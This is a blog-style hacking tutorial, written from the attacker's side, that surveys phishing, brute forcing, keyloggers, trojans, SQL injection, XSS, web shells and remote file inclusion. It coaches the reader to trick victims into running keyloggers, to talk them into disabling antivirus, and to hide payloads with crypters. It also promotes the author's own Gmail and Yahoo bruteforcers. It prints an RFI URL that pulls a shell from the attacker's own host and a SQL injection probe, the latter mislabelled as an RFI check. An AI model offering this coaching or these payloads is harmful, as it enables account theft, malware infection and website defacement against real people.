Basic Types of HackingBasic Types of Hacking

Getting back to the
main point, I am going
to discuss some of the
ways of hacking in brief.
Hacking is basically
bifurcated in 2 major
parts.
1. Email or the user
information
2. Web based hacking.
Email or user
information:
These days the most
commonly used and
famous way of hacking
user information like
Emails, Passwords,
Credit card details are
as follow:
a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans
a. Phishing:
Phishing is basically a
massive attack. What a
hacker does is, they
created an absoulutely
look alike page of some
website like yahoo or
gmail. They upload it to
their own server. And
give the link to any n00b
user. When they open it,
they think that they are
on the yahoo or gmail
page, they put in their
username and
password, click on
submit and WHOA! your
information has been
submitted. This is
widely used by new
people trying to
entering into ahcking
world.
Most recent example in
india was some scam
with ICICI bank, lots of
user info was stolen as
far as i remember. I
read it somewhere in
the news paper and
was thinking what the
hell! ?
Disadvantages: Still
many people give it a
try before going for
phishing, because the
only problem in phishing
is, even if the victim
knows a little about
internet, he will read
the URL and understand
that it is not a genuine
website.
b. Brute Forcing
Brute forcer is basically
a program which could
be called as a "cracker".
In brute focer you put
the username you want
to hack, and as a
password you put a
notepad file which has
almost all of the
existing english words
in it. So what it does is,
it will try each and
every word from that
file and see if anything
matches. You might
have noticed some
topics like "huge pass
list" on different
forums, they are
nothing but the
password list to put
into your bruteforcer.!
Disadvantages:
1. Sometimes brute
forcing may just go for
ages!
2. It isnt guaranteed
3. These days many
people have alpha-
numeric-symbol
password which is real
tough for brutefocer to
detect
4. Most of the famous
sites like yahoo, gmail
are designed in such a
way that it will put the
"image captcha" after 3
incorrect login
attempts, which stops
the bruteforcer.
P.S:- I have made some
focused FTP, Gmail &
Yahoo bruteforcers
which are avilable on my
website.
c. Keylogging
Keylogger helps you to
create a little filed
which is known as
"server". You gotta send
your server to the
victim. he has to click on
it and then YOUR DONE!
this is what happens.
Best possible way to
hack someone.
Keyloggers are basically
a program which will
install themselves in
your victim's computer
and will keep on
recording each and
every keystroke
pressed by the victim
on his keyboard and it
will send it to the
hacker. There are many
ways to receive the
keystroke i.e. FTP,
Email, Messengers.
According to me this is
the best way to trick
your victim and get
their information
Disadvantages :
1. When victim receives
the keylogger, in most
of the cases, their anti
virus would auto delete
them. So you have to
convince them to
desable the anti virus
by bluffing something.
2. Sometimes firewall
blocks the keylogs from
being sent.
Tips :
1. There are some
programs which are
known as "crypters"
which will help you to
make your server's
undetectable. So your
victim's anti-virus would
not be able to detect
them.
d. Trojans:
Trojans are like father
of keyloggers. Trojan
sends you the keylogs
just as keyloggers, on
top of that, it lets you
take the control of
victim's computer. Edit /
delete/ upload /
download files from or
to their computer. Some
more funny features
like it will make their
keyboard go mad, it
may kep on ejecting and
re-inserting the cd ROM.
Much more..
Disadvantages :
Same as keyloggers.
Tips :
Same as keylogger.
Web Hacking:
I will discuss some
most commonly used
web hacking techniques
which helps hackers to
hack any website. This
will help you to SAVE
YOUR SITE!
1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more
but they are TOOO big
to be discussed in here.
1. SQL Injection:
Most of the websites
these days are
connected to an SQL
Database. Which helps
them to store
usernames and
passwords [encrypted]
when a guest registers
to their website. SQL
database processes a
querie everytime a user
logs in. It goes to the
database, validates the
password, if its correct
then it logs in the user
and if its not then it
gives an error.
So the basic funda is
executing a command
to parase a query in the
database to try to
exploit the internet
information of the
database. I cant really
put the entire tutorial
about because this is
the most complicated
way to hack the
website!
P.S.:- If you wanna
check if YOUR website
is vulnerable to RFI
attach or not then do
the following .
If your site's URL is:
Code:
yoursite.com/index.php?id=545
just add a ' like this at
the end
Code:
yoursite.com/index.php?id=545'
2. XSS:
XSS is another nice way
to ahck some website.
Suppose if some
website/ forum is
allowing HTML in the
psot or articles, then a
hacker can post a
malicious script into the
content. So whenever a
user opens up the page,
the cookies would be
sent to the hacker. So
he can login as that
user and f*ck the
website up.
3. Shells:
Shell is a malicious .php
script. What you have
to do is, find a palce in
any website where you
can upload any file like
avatars, recepie, your
tricks, your feedbacks.
And you try to upload
your shell files from
there. And if its
uploaded then WHOA!
you open it from the
URL bar and u can see
the entire "FTP" account
of that webhosting.
YOu can rename/edit /
upload/download
anything u want
including the index page.
This is also known as
deface.
4. RFI:
RFI is a good way to
deface a website. It is
used with shell.
Suppose you have
uploaded your shell on:
Code:
yoursite.com/shell.txt
and you found a
vulnerable site to RFI...
then you can do as
follow:
Code:
victimssite.com/index.php?page=yousite.com/shell.txt
This will again give u
the access of your
victim's sites FTP , just
as shell so you can f*ck
up anything you want.
P.S.:- If you wanna
check if YOUR website
is vulnerable to RFI
attach or not then do
the following .
If your site's URL is:
Code:
yoursite.com/index.php?id=545
just add something liek
this at the end
Code:
yoursite.com/index.php?id=http://w w w.google.com
And if it incldes the
google page into your
page, that means its
vulnerable to RFI

Comments

Popular Posts